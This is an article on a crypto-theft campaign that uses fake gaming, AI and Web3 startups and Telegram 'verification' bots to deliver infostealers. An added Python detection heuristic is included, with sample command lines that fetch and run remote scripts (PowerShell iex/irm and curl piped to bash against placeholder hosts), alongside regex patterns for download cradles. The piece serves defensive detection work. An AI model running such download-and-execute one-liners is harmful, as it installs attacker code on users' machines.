A cybercrime campaign is targeting cryptocurrency users by posing as gaming, artificial intelligence (AI), and Web3 startups. According to recent research from cybersecurity firm Darktrace, the threat actors use popular communication platforms such as Telegram and Discord to make contact with victims and distribute malware.
Creation of Fake Companies
These fraudulent entities present themselves as innovative startups in the gaming, AI, and Web3 sectors. Their online presence includes professionally designed websites, detailed whitepapers, project roadmaps, and even fabricated employee profiles, all crafted to enhance credibility and lure potential victims.
Social Media Manipulation
The attackers exploit social media to amplify their reach and legitimacy. They often use compromised or counterfeit X (formerly Twitter) accounts, some of which are verified and boast large followings. These accounts are used to initiate contact with potential victims and promote the fraudulent projects.
Malicious Documentation and Communication
To further their deception, threat actors host fake project documentation on platforms such as Notion, Medium, and GitHub. Victims are then approached via direct messages on Telegram, Discord, and similar platforms, typically under the guise of discussing investment opportunities, exclusive offers, or employment.
Malware Distribution Techniques
Delivery Methods
Victims are tricked into downloading malicious software disguised as legitimate applications, such as meeting tools or crypto trading utilities. These downloads target both Windows and macOS operating systems.
Types of Malware
The campaign deploys a range of infostealers, including Realst and AMOS (Atomic Stealer) on macOS and StealC on Windows, alongside Angel Drainer, a wallet-draining kit that empties a wallet through transactions the victim is tricked into approving rather than by infecting the endpoint. Together they harvest browser-stored credentials and session data, wallet files and seed phrases, and other sensitive personal and financial information, and then drain the cryptocurrency wallets they can reach.
Evasion Tactics
To avoid detection, the binaries are often signed with stolen code-signing certificates so they clear signature checks and operating-system trust prompts, obfuscated to defeat static signatures, and fitted with anti-sandboxing checks that keep the payload dormant inside analysis environments. A valid signature therefore proves only that someone held a certificate, not that the signer is the vendor the application claims to be; when vetting a download, compare the signer's identity against the purported company rather than checking only that the signature verifies.
Exploiting Telegram and Discord
Telegram
On Telegram, scammers invite users into exclusive groups and then ask them to "verify" their account through a bot. The widely reported "OfficialSafeguardBot" lure, for example, imitates Telegram's legitimate Safeguard verification bot and walks the user through steps that end with them pasting and running a command on their own machine; no Telegram vulnerability is involved. That command fetches the stealer, which then harvests private keys and gives the attackers access to the victim's cryptocurrency wallets.
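The "verification" step above ends with the victim running something themselves, which is the point a defender can catch on the endpoint. The following Python is an added example, not code from the article or from Darktrace; it assumes, as public reporting on this lure describes, that the final step is a one-liner pasted into the Windows Run dialog or a terminal, and scores process-creation events for the traits those one-liners share. Every event in it is constructed for illustration; the indicator names, thresholds and the `example.invalid` hosts are the author's choices, not artifacts from the campaign.

```python
"""Heuristic triage for "paste this command to verify your account" lures.

Added example, not code from the original article or from Darktrace. It
assumes the Telegram/Discord "verification" flow ends with the victim pasting
a one-liner into the Windows Run dialog or a terminal, so it scores process
command lines for the traits such one-liners share. The sample events below
are constructed for illustration, not captured from the campaign.
"""
import re
from typing import Dict, List, Tuple

# Each indicator is one trait of a download-and-execute one-liner.
INDICATORS: Dict[str, re.Pattern] = {
    # PowerShell started with a hidden window so the victim sees nothing.
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    # Fetches a second stage from a remote host.
    "download_cradle": re.compile(
        r"\b(?:irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl|wget)\b",
        re.I),
    # Executes fetched text in memory (PowerShell iex, or a curl|bash pipe).
    "inline_exec": re.compile(r"\b(?:iex|Invoke-Expression)\b|\|\s*(?:bash|sh|zsh)\b", re.I),
    # Base64-encoded command, used to hide the above from casual inspection.
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    # Disables the local script execution policy.
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass\b", re.I),
}

# Parents from which a human pasting into Win+R or a terminal launches a
# process. Only counted when at least one other indicator fired, so ordinary
# user-launched programs do not collect a point from their parent alone.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "windowsterminal.exe"}


def score_command(cmdline: str, parent: str = "") -> Tuple[int, List[str]]:
    """Return (score, indicator names) for one process-creation event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if hits and parent.lower() in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    return len(hits), hits


def is_paste_and_run(cmdline: str, parent: str = "", threshold: int = 3) -> bool:
    """True when enough traits co-occur to treat the event as a pasted lure."""
    return score_command(cmdline, parent)[0] >= threshold


def triage(events: List[Dict[str, str]], threshold: int = 3) -> List[str]:
    """Return the ids of events that meet the threshold, in input order."""
    return [e["id"] for e in events if is_paste_and_run(e["cmd"], e["parent"], threshold)]


# Constructed process-creation events (parent process + command line).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "run-dialog-cradle", "parent": "explorer.exe",
     "cmd": 'powershell -w hidden -c "iex (irm https://example.invalid/verify.ps1)"'},
    {"id": "run-dialog-encoded", "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
            "-EncodedCommand aQBlAHgAIAAoAGkAcgBtAA=="},
    {"id": "terminal-pipe", "parent": "Terminal",
     "cmd": "curl -fsSL https://example.invalid/setup.sh | bash"},
    # Benign look-alikes: a user-run local script and a scheduled deployment.
    {"id": "user-backup-script", "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"id": "scheduled-deploy", "parent": "svchost.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\Deploy\\install.ps1"},
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        score, hits = score_command(event["cmd"], event["parent"])
        flag = "FLAG" if score >= 3 else "    "
        print(f"{flag} {score} {event['id']:<20} {', '.join(hits)}")
```

The threshold of three is deliberately above what a single legitimate trait produces: an administrator's `-ExecutionPolicy Bypass -File` from a scheduled task scores one, while the pasted lures score three or more because download, execution and concealment arrive together in one command line spawned by an interactive parent. Feed it command lines from Windows event 4688 or Sysmon event 1 (with parent process) and tune the indicator list to your environment.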
Discord
A similar approach is employed on Discord, where attackers impersonate legitimate projects and distribute malware through direct messages or public channels frequented by cryptocurrency and NFT enthusiasts.
Impact and Ongoing Threat
The sophistication of these scams makes them difficult to distinguish from legitimate startups. Victims have reported substantial financial losses, in some cases amounting to millions of dollars in stolen cryptocurrency. The campaign is ongoing and continues to evolve, with threat actors adopting new themes and more advanced evasion techniques.